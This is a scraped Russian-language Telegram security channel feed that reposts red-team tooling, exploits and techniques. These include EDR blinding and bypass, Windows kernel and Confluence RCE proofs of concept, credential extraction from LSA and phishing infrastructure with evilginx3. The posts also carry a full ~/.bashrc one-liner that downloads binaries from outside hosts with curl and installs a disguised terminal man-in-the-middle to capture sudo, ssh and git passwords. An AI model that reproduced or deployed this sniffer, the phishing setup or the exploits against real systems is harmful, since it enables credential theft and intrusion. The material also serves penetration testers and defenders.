@Michaelzhm прислал статейку) Нового ничего нет, но если кто не знал про данную технику из категории Blind EDR, то вам понравится... Достигается путём изменения значения альтитуды минифильтра и перекрытия коллбэков EDR.
https://tierzerosecurity.co.nz/2024/03/27/blind-edr.html
#bypass #evasion #edr #redteam #maldev
https://tierzerosecurity.co.nz/2024/03/27/blind-edr.html
#bypass #evasion #edr #redteam #maldev
Tier Zero Security
Information Security Services. Offensive Security, Penetration Testing, Mobile and Application, Purple Team, Red Team
Forwarded from Offensive Twitter
😈 [ Zoro @Evi1cg ]
atexec-pro
🔗 https://github.com/ridter/atexec-pro
🔗 https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.3_from_RPC_to_lateral_movement.html
🐥 [ tweet ]
atexec-pro
🔗 https://github.com/ridter/atexec-pro
🔗 https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.3_from_RPC_to_lateral_movement.html
🐥 [ tweet ]
люблю такой креатив
Forwarded from PurpleBear (Vadim Shelest)
В этой заметке хочу рассказать про новую платформу Xintra - APT Emulation Labs, которая позиционируется как площадка для прокачки навыков
Я уже несколько раз писал про платформы для обучения и совершенствования навыков защитников, поэтому еще одна точно лишний не будет😎
➕На данный момент площадка представляет собой лабораторное окружение в веб-интерфейсе с 3 лабами имитирующими
➕ Каждая лаба состоит из 40-60 вопросов, на которые предстоит ответить при расследовании инцидента
➕ Со слов разработчиков на решение каждой лабы потребуется 30-40 часов для опытных аналитиков
➖7 дневная триалка только после привязки карты
➖минимальная стоимость подписки - 45$/мес
Таким образом, платформ для прокачки навыков защитников становится больше и это радует👍 А если хочется сначала понять зайдет-не зайдет рекомендую посмотреть на бесплатную defbox.io
IR against APT-level threats
. Я уже несколько раз писал про платформы для обучения и совершенствования навыков защитников, поэтому еще одна точно лишний не будет😎
➕На данный момент площадка представляет собой лабораторное окружение в веб-интерфейсе с 3 лабами имитирующими
Incident Response
кейсы по отработке различных навыков на примере атак APT-29
🐻, APT-10
🐼, AlphV (BlackCat)
🐈⬛➕ Каждая лаба состоит из 40-60 вопросов, на которые предстоит ответить при расследовании инцидента
➕ Со слов разработчиков на решение каждой лабы потребуется 30-40 часов для опытных аналитиков
SOC
и 60-70 часов для новичков➖7 дневная триалка только после привязки карты
➖минимальная стоимость подписки - 45$/мес
Таким образом, платформ для прокачки навыков защитников становится больше и это радует👍 А если хочется сначала понять зайдет-не зайдет рекомендую посмотреть на бесплатную defbox.io
Forwarded from PT SWARM
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
Forwarded from Threat Hunt
#maldev #redteam
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
https://github.com/Helixo32/CrimsonEDR
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
./compile.sh
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
https://github.com/Helixo32/CrimsonEDR
GitHub
GitHub - Helixo32/CrimsonEDR: Simulate the behavior of AV/EDR for malware development training.
Simulate the behavior of AV/EDR for malware development training. - Helixo32/CrimsonEDR
CVE-2024-21338: Windows Admin-to-Kernel LPE
Уязвимы Windows 10 & 11
PoC: https://github.com/hakaioffsec/CVE-2024-21338
Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
#lpe #windows #exploit #redteam
Уязвимы Windows 10 & 11
PoC: https://github.com/hakaioffsec/CVE-2024-21338
Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
#lpe #windows #exploit #redteam
Ну это прям реально полный гайд по Bloodhound CE. Для тех, кто ещё старым пользуется.
https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
#pentest #enum #bloodhound
https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
#pentest #enum #bloodhound
Medium
The Ultimate Guide for BloodHound Community Edition (BHCE)
I’ve run into many interested hackers who want to learn how to use BloodHound, but struggle to get started. Here’s how to be effective!
Ой, красота))) Получить данные из LSA без дампа LSASS.
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
GitHub
GitHub - EvanMcBroom/lsa-whisperer: Tools for interacting with authentication packages using their individual message protocols
Tools for interacting with authentication packages using their individual message protocols - EvanMcBroom/lsa-whisperer
CLI tool (python) for managing Cortex XDR
* changing rules
* restarting the XDR process
* disabling the local analysis engine
* inserting any python code to run
https://github.com/SafeBreach-Labs/CortexVortex
#edr #redteam #bypass
* changing rules
* restarting the XDR process
* disabling the local analysis engine
* inserting any python code to run
https://github.com/SafeBreach-Labs/CortexVortex
#edr #redteam #bypass
GitHub
GitHub - SafeBreach-Labs/CortexVortex
Contribute to SafeBreach-Labs/CortexVortex development by creating an account on GitHub.
Forwarded from PurpleBear (Vadim Shelest)
В продолжении темы про подготовку
По сути это форк оригинальных
В блоге автора подробно описано каким образом настроить
✅ Необходимо просто зарегать учетку
✅ Поменять дизайн дефолтных страниц с антибот-проверкой
✅ Let's go phishing🎣
К тому же злоумышленники уже давно используют эту технологию, поэтому по моему мнению очень важно проверить во время тестирований насколько используемые средства защиты и процессы в вашей организации позволяют противостоять подобным угрозам на практике.
#phishing #evilgophish #cloudflare_turnstile
Red Teaming инфраструктуры
для проведения социо-технических этапов тестирований aka фишинга для получения первоначального доступа, обычно используется Evilgophish от fin3ss3g0d. По сути это форк оригинальных
Evilginx
и Gophish
с расширенной функциональностью, о котором я уже неоднократно писал и рассказывал. Этот инструмент прямо из коробки позволяет настроить использование Cloudflare Turnstile в качестве эффективного решения для противодействия ботам и автоматизированным сканерам, которое в отличии от классических решений CAPTCHA
с выбором картинок и набором текста совсем не влияет на UX
😎 В блоге автора подробно описано каким образом настроить
Cloudflare Turnstile
:✅ Необходимо просто зарегать учетку
Cloudflare
(бесплатный уровень подписки), добавить домен фишинговой страницы и скопировать ключи для использования сервиса ./evilginx3 -feed -g ../gophish/gophish.db -turnstile <PUBLIC_KEY>:<PRIVATE_KEY>
✅ Поменять дизайн дефолтных страниц с антибот-проверкой
evilginx3/templates/turnstile.html
и 403 Forbidden evilginx3/templates/forbidden.html
, LLM справится с этой задачей за 3 секунды🙈✅ Let's go phishing🎣
К тому же злоумышленники уже давно используют эту технологию, поэтому по моему мнению очень важно проверить во время тестирований насколько используемые средства защиты и процессы в вашей организации позволяют противостоять подобным угрозам на практике.
#phishing #evilgophish #cloudflare_turnstile
GitHub
GitHub - fin3ss3g0d/evilgophish: evilginx3 + gophish
evilginx3 + gophish. Contribute to fin3ss3g0d/evilgophish development by creating an account on GitHub.
SilverPotato...
https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
#potato #pentest #redteam
https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
#potato #pentest #redteam
Decoder's Blog
Hello: I’m your Domain Admin and I want to authenticate against you
TL;DR (really?): Members of Distributed COM Users or Performance Log Users Groups can trigger from remote and relay the authentication of users connected on the target server, including Domain Cont…
Forwarded from Offensive Twitter
😈 [ The Hacker's Choice (@[email protected]) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
intro.gif
860 KB
Почему-то только сегодня обратил внимание на эту удобную штуку (ох, два года уже репозиторию)😅
https://github.com/aniqfakhrul/powerview.py
#ad #pentest #enum
https://github.com/aniqfakhrul/powerview.py
#ad #pentest #enum
CVE-2024-21683: Confluence Auth RCE
https://github.com/W01fh4cker/CVE-2024-21683-RCE
#exploit #git #web
https://github.com/W01fh4cker/CVE-2024-21683-RCE
#exploit #git #web
GitHub
GitHub - W01fh4cker/CVE-2024-21683-RCE: CVE-2024-21683 Confluence Post Auth RCE
CVE-2024-21683 Confluence Post Auth RCE. Contribute to W01fh4cker/CVE-2024-21683-RCE development by creating an account on GitHub.